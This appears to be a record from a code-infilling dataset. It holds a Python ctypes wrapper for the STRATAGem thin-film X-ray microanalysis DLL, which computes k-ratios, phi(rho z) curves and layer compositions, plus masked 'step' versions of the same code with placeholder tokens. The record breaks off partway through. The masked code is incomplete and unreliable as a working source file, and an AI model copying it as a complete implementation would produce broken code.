logger.debug('Added dummy experiment for z=%i', z)
exp = Experiment(z, LINE_KA, 0.0, analyzed=False) # dummy
self.add_experiment(exp)
# Set iteration maximum
iteration_max_ = c.c_int(iteration_max)
logger.debug('StSetMaxNbIter(%i)', iteration_max)
self._lib.StSetMaxNbIter(iteration_max_)
# Compute
logger.debug('StComputeIterpStart(key)')
if not self._lib.StComputeIterpStart(self._key):
self._raise_error("Cannot start iteration")
continue_ = c.c_bool(True)
iteration = 0
logger.debug('Start iteration')
while True:
iteration += 1
logger.debug('Iteration #%i' % iteration)
logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
break
if not continue_.value:
break
logger.debug('Iteration completed')
# Fetch results
thick_known = c.c_bool()
mass_thickness = c.c_double()
thickness = c.c_double()
density = c.c_double()
def get_layer(layer, ilayer):
ilayer_ = c.c_int(ilayer)
logger.debug('StSdGetNbElts(key, %i)' % ilayer)
nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
if nbelt == -1:
self._raise_error("Cannot get number of elements")
flag_ = (c.c_int * nbelt)()
wfs_ = (c.c_double * nbelt)()
logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
if not self._lib.StSdGetLayRawConcs(self._key, ilayer_,
flag_, wfs_):
self._raise_error("Cannot get layer concentration")
composition = {}
for z in layer.composition.keys():
nra_ = c.c_int(z)
logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
composition[z] = wfs_[zindex]
logger.debug("StSdGetThick(key, %i)", ilayer)
if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(thick_known),
c.byref(mass_thickness), c.byref(thickness),
c.byref(density)):
self._raise_error("Cannot get thickness")
return (composition, thickness.value / 1e10,
mass_thickness.value * 10.0, density.value * 1e3)
sample = Sample(get_layer(*self._substrate)[0])
for layer, ilayer in self._layers.items():
sample.add_layer(*get_layer(layer, ilayer))
return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
"""
Compute :math:`\\phi(\\rho z)` of all experiments.
.. warning:: Only available for substrate (no layers).
:arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
distribution in meters. If ``None``, Kanaya-Okayama electron range
is used with a safety factor of 1.5.
:type maxdepth_m: :class:`float`
:arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
:type bins: :class:`int`
:return: a :class:`dict` where the keys are the experiments and the
values are a tuple containing three lists:
* :math:`\\rho z` coordinates (in g/cm2)
* generated intensities of :math:`\\phi(\\rho z)` (no absorption)
* emitted intensites of :math:`\\phi(\\rho z)`
"""
if len(self._layers) > 0:
raise RuntimeError('PRZ can only be computed for substrate')
# Set scaling
hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
maxhv_eV = max(hvs_eV)
maxhv_ = c.c_double(maxhv_eV / 1e3)
logger.debug('StSetScaleHV(%s)', maxhv_eV / 1e3)
self._lib.StSetScaleHV(maxhv_)
# Compute
logger.debug('StComputePrz(key)')
if not self._lib.StComputePrz(self._key):
self._raise_error('Cannot compute prz')
# Get values
przs = {}
for experiment, indexes in self._experiments.items():
# Size of each bin
if maxdepth_m is None:
# Calculate max depth using Kanaya-Okayama
maxdepth_m = 0.0
energy_keV = experiment.energy_eV / 1e3
for z, fraction in self._substrate[0].composition.items():
dr = (0.0276 * atomic_mass_kg_mol(z) * 1e3 * energy_keV ** 1.67) / \
(z ** 0.89 * mass_density_kg_m3(z) / 1e3)
maxdepth_m += fraction / (dr * 1e-6)
maxdepth_m = 1.0 / maxdepth_m
maxdepth_m *= 1.5 # safety factor
increment_kg_m2 = (maxdepth_m * self._substrate[0].density_kg_m3) / bins
# Indexes
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
ihv_ = c.c_int(0)
rzs = []
ys_generated = []
ys_emitted = []
for i in range(bins):
rz_ = c.c_double(i * increment_kg_m2 * 0.1)
rzs.append(i * increment_kg_m2)
y_ = c.c_double()
bUseExp_ = c.c_bool(True)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_emitted.append(y_.value)
y_ = c.c_double()
bUseExp_ = c.c_bool(False)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_generated.append(y_.value)
przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
return przs
|
flexible
|
{
"blob_id": "6914656a2f78fa1fe74a67bf09b017585b3eac88",
"index": 2770,
"step-1": "<mask token>\n\n\nclass Stratagem:\n <mask token>\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n <mask token>\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n <mask token>\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n <mask token>\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n <mask token>\n <mask token>\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n <mask token>\n <mask token>\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n <mask token>\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n <mask token>\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n <mask token>\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n <mask token>\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-2": "<mask token>\n\n\nclass Stratagem:\n <mask token>\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n <mask token>\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n <mask token>\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n <mask token>\n <mask token>\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, 